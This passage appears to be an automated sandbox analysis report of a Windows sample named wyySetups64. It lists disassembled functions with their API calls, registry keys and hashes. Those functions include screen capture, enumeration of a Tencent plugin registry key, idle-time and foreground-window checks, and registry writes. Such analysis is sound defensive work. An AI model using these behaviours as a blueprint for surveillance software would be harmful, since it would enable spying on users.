                                                                                                                                                                                                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                                                                                                              • API String ID: 2158625971-3190923360
                                                                                                                                                                                                              • Opcode ID: f3c2e8577a981eaf7c4b0c20984a435a68fa3bc06729bd8a609c9f63802d9667
                                                                                                                                                                                                              • Instruction ID: de6feac0fbf6caadf2f3cd16d4a38c2a2c0734163a87abff1275fa6fada4bc91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3c2e8577a981eaf7c4b0c20984a435a68fa3bc06729bd8a609c9f63802d9667
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531B875A40308BFEB24EBA4CCC5EBF777CDB48750F140519BA06E6145E674DA04C760
                                                                                                                                                                                                              Function 0337C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,?,7AA29978,?,00000000,?), ref: 0337C09E
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0337C0AA
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0337C0BF
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0337C0D5
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64), ref: 0337C113
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64), ref: 0337C124
                                                                                                                                                                                                                • Part of subcall function 03379DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03379E04
                                                                                                                                                                                                                • Part of subcall function 03379DE0: GdipDisposeImage.GDIPLUS(?), ref: 03379E18
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0337C14C
                                                                                                                                                                                                                • Part of subcall function 0337A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0337A48D
                                                                                                                                                                                                                • Part of subcall function 0337A460: _free.LIBCMT ref: 0337A503
                                                                                                                                                                                                              • GetHGlobalFromStream.OLE32(?,?), ref: 0337C16D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 0337C177
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0337C18F
                                                                                                                                                                                                                • Part of subcall function 03379BA0: DeleteObject.GDI32(?), ref: 03379BD2
                                                                                                                                                                                                                • Part of subcall function 03379BA0: EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BE3
                                                                                                                                                                                                                • Part of subcall function 03379BA0: EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BF8
                                                                                                                                                                                                                • Part of subcall function 03379BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03379B7B), ref: 03379C04
                                                                                                                                                                                                                • Part of subcall function 03379BA0: LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C15
                                                                                                                                                                                                                • Part of subcall function 03379BA0: LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C1C
                                                                                                                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 0337C1A5
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 0337C221
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0337C249
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1483550337-0
                                                                                                                                                                                                              • Opcode ID: 9fd20989ca3105c90db4ab1fc6461bf2a0bd5c89014fecbe6524eb8f415621ac
                                                                                                                                                                                                              • Instruction ID: ffe291feb5c3749f767a62de592beac143494ea26daaf93d9d83a3ef9f3ea491
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fd20989ca3105c90db4ab1fc6461bf2a0bd5c89014fecbe6524eb8f415621ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 236117B5D0021CEFDB20EFA8D8C4A9EBBB8FF49710F20452AE515EB241DB359905CB90
                                                                                                                                                                                                              Function 03376490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033764C2
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 033764E2
                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03376524
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376560
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337658E
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765BA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765C3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765D5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03376625
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 03376635
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Software\Tencent\Plugin\VAS, xrefs: 033764D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                                                                                                              • String ID: Software\Tencent\Plugin\VAS
                                                                                                                                                                                                              • API String ID: 2921034913-3343197220
                                                                                                                                                                                                              • Opcode ID: f5bc8d0c5031981ab59063607eb23cd7c7d280b0628c8c11600ba333a5d29188
                                                                                                                                                                                                              • Instruction ID: b4a10a192fa2b67f3bfa2cfa81edb5c071ebedf70a38503aa25dd030846fae9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5bc8d0c5031981ab59063607eb23cd7c7d280b0628c8c11600ba333a5d29188
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E4195F5E40218ABDB34EB50CDC5FEAB37CEB44700F404599E709B6141EA75AA858B64
                                                                                                                                                                                                              Function 0337A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0337A48D
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0337A4D1
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A503
                                                                                                                                                                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0337A522
                                                                                                                                                                                                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0337A594
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0337A59F
                                                                                                                                                                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0337A5C5
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0337A5DD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 2794124522-3042966939
                                                                                                                                                                                                              • Opcode ID: 96d8dbe43a28239c9b4636d2528a9cccb392e103af78bdcfce384312dce09f3b
                                                                                                                                                                                                              • Instruction ID: 4141a957d2420e0fb12c3eac67c5dc986082d7f5bfa6c3ce583fc8467c7b7f67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96d8dbe43a28239c9b4636d2528a9cccb392e103af78bdcfce384312dce09f3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F55153B5E00219AFDB24DFA4D8C4EEFB7B8AF48750F048159E905AB350D739A945CBE0
                                                                                                                                                                                                              Function 00BD52B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00BD5382
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00BD5392
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,00BEC6E0,000012A0), ref: 00BD53B0
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD53BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00BD540F
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 00BD541B
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD5434
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                              • API String ID: 864241144-2243437601
                                                                                                                                                                                                              • Opcode ID: e5dc7de447577991d2e973742e8b59c222dac3d1bc7300c7d12f0d8b5fb707f5
                                                                                                                                                                                                              • Instruction ID: 8af243351a8f894bb4b23de5e30fd21d4d8c10901cde0bc200c296e1a2b97805
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5dc7de447577991d2e973742e8b59c222dac3d1bc7300c7d12f0d8b5fb707f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2941FA316486819FD3309B248C85A7ABBE5EB51354F5804CAE5838B352FB70D806C756
                                                                                                                                                                                                              Function 00BD52D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00BD5382
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00BD5392
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,00BEC6E0,000012A0), ref: 00BD53B0
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD53BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00BD540F
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 00BD541B
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD5434
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                              • API String ID: 864241144-2243437601
                                                                                                                                                                                                              • Opcode ID: c48ec0aeaf29484f45f0e137261d2459d9e3051aed8d2651eb78f266e64a779a
                                                                                                                                                                                                              • Instruction ID: 7447e777b51be91021da5589da1bc20f673e70ed6fe9e188fd62c6a8a45a725f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48ec0aeaf29484f45f0e137261d2459d9e3051aed8d2651eb78f266e64a779a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31C5302887C19FD730CB308859B7ABBE5EB54354F9804CAF1868B352E7B0D846C766
                                                                                                                                                                                                              Function 0337CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,033912F8,7AA29978,00000001,00000000,00000000), ref: 0337CAB1
                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(033912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0337CAE0
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CB44
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CB53
                                                                                                                                                                                                              • RegEnumValueW.KERNEL32(033912F8,?,00000000,?,00000000,?,00000000,?), ref: 0337CB72
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                                • Part of subcall function 0337F707: __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(033912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,033912F8,000000FF), ref: 0337CC83
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                                                                                                              • String ID: Console\0
                                                                                                                                                                                                              • API String ID: 1348767993-1253790388
                                                                                                                                                                                                              • Opcode ID: ed7c8f06f959d1a23a678677d1411ffbbf91db82626b0c377bffbbf486ed21e1
                                                                                                                                                                                                              • Instruction ID: e46f8e5c7793d987da436bbb537ca3134d41751e9d0213b1956d90875eb45484
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed7c8f06f959d1a23a678677d1411ffbbf91db82626b0c377bffbbf486ed21e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43611DB5E00219AFDB14DFA8D8C0EAEB7B8FB48310F14466AF915EB345D7359901CBA0
                                                                                                                                                                                                              Function 0337BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BB21
                                                                                                                                                                                                              • GetLastInputInfo.USER32(?), ref: 0337BB37
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337BB3D
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337BB66
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0337BB6F
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0337BB83
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                                                                                                              • String ID: %d min
                                                                                                                                                                                                              • API String ID: 3754759880-1947832151
                                                                                                                                                                                                              • Opcode ID: 79906b25d9fe24be0d5ade3ab6405e834985998073a810c3a7010e8b3745bc3e
                                                                                                                                                                                                              • Instruction ID: e0d0148edb0818f28985bd2022da5141f22ec87ab83e3ba49cf71e73e5e1ab58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79906b25d9fe24be0d5ade3ab6405e834985998073a810c3a7010e8b3745bc3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF41B2B5D00218AFCB10EFA4CCC4E9FBBB8EF48700F088155F9099B255D6789A00CBE1
                                                                                                                                                                                                              Function 03376910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(7AA29978,00000000,00000000,75BF73E0,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376938
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376947
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 0337696B
                                                                                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 033769BE
                                                                                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 033769CC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,033910DB,000000FF), ref: 03376A2E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,033910DB,000000FF), ref: 03376A34
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 429299433-0
                                                                                                                                                                                                              • Opcode ID: f91e6cde62eecbf209dc3c174c01d60f130d5ae192f8c5d7febd46e9351a83c2
                                                                                                                                                                                                              • Instruction ID: 6328903e239417cd76b26e5ae502da2bf47479f5dbedc80b303f8d784c3b9a35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f91e6cde62eecbf209dc3c174c01d60f130d5ae192f8c5d7febd46e9351a83c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 834195B2D00A18EBDB20DFA8CCC1AAFF7B8FB45710F14456AE955F7241D77999008BA0
                                                                                                                                                                                                              Function 03376D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376DD9
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,03395164,00000000,00020019,75BF73E0), ref: 03376DFC
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03376E4A
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,03395148), ref: 03376E60
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(033756EA,?), ref: 03376E72
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                              • String ID: GROUP
                                                                                                                                                                                                              • API String ID: 2102619503-2593425013
                                                                                                                                                                                                              • Opcode ID: 872144275fe10206fbf196322535d4108f838da11b7592d7dc7775a15a14811b
                                                                                                                                                                                                              • Instruction ID: 724a5ccd3d7a15a801b67ac606975b6e7e64df946da747b95667bd0396c3027e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 872144275fe10206fbf196322535d4108f838da11b7592d7dc7775a15a14811b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59318771900719FBDB30DF90DDC9B9EB7B8FB08710F100299E515A6290DB799A84CF60
                                                                                                                                                                                                              Function 00BD721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD7240
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00BD724C
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BD7259
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,00BD71B6,00000000,?,?), ref: 00BD7290
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00BD729A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD72A3
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD72AE
                                                                                                                                                                                                                • Part of subcall function 00BD710D: __getptd_noexit.LIBCMT ref: 00BD710D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 155776804-0
                                                                                                                                                                                                              • Opcode ID: 1ec73021328d69cd22697e2f1fd6dcf989e4304dae29b2b74e98db30381b5018
                                                                                                                                                                                                              • Instruction ID: 0c8149795ece71288e7c399023b0dbc849954ea99690fcd309aba9149de6e864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ec73021328d69cd22697e2f1fd6dcf989e4304dae29b2b74e98db30381b5018
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 121182322487866FD721AFA59C429DBB7E8EF46774B1001ABF9549A352FF71D80086A0
                                                                                                                                                                                                              Function 0337FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337FA4E
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 0337FA5A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0337FA67
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0337F9C4,00000000,00000000,0337E003), ref: 0337FA9E
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,0337E003,00000000,00000000,03375F40,00000000,00000000,00000000), ref: 0337FAA8
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337FAB1
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0337FABC
                                                                                                                                                                                                                • Part of subcall function 0337F91B: __getptd_noexit.LIBCMT ref: 0337F91B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 155776804-0
                                                                                                                                                                                                              • Opcode ID: 10eec96f844a7bbca7101e3a0777e2e36d0e1b7c25120931fd2b53bdc6f0ad4c
                                                                                                                                                                                                              • Instruction ID: e3e889aa16e0aab349f463393097d176d71d02a0a0075040514f523adeb46a71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10eec96f844a7bbca7101e3a0777e2e36d0e1b7c25120931fd2b53bdc6f0ad4c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311C23A60470ABFDB21FFA9ECC099B37D9EF05B70B140426F9048A150DB79D401CA60
                                                                                                                                                                                                              Function 03377410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
